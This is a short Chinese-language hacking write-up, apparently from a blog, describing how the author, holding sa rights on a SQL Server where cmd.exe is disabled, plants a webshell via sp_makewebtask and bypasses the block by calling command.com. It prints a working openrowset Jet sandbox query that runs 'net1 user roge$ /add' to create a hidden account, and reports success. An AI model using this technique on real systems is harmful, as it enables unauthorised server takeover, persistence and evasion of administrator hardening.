sa权限，用xp_cmdshell执行cmd但是返回命令行提示已关闭

 
然后又试了试其他存储OA，job，沙盒什么的全部玩了一圈下来，照样不能执行命令,很无奈啊，遇见个变态sa
 
试试了sp_makewebtask存储，还好能导出了个webshell
 
进去看看情况到底咋回事
 
连上sql 执行命令时突然想起穿山甲的4个存储过程执行命令都调用了CMD
 
cmd被禁用了，当然没得玩了
 
传了个cmd上去试试一样的不能执行
 
想了想用其他大杀器试试提权，cmd禁用了也没得玩了
 
在system32翻了翻，发现command.com也能执行命令，基本跟cmd差不多，但不太清楚这算不算命令提示符
 
在本机试了试，禁用了cmd，发现command.com正常运行。哈哈
 
果断调用沙盒用command.com执行
 
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("command.com /c  net1 user roge$ /add")')
 
net user 看了看成功执行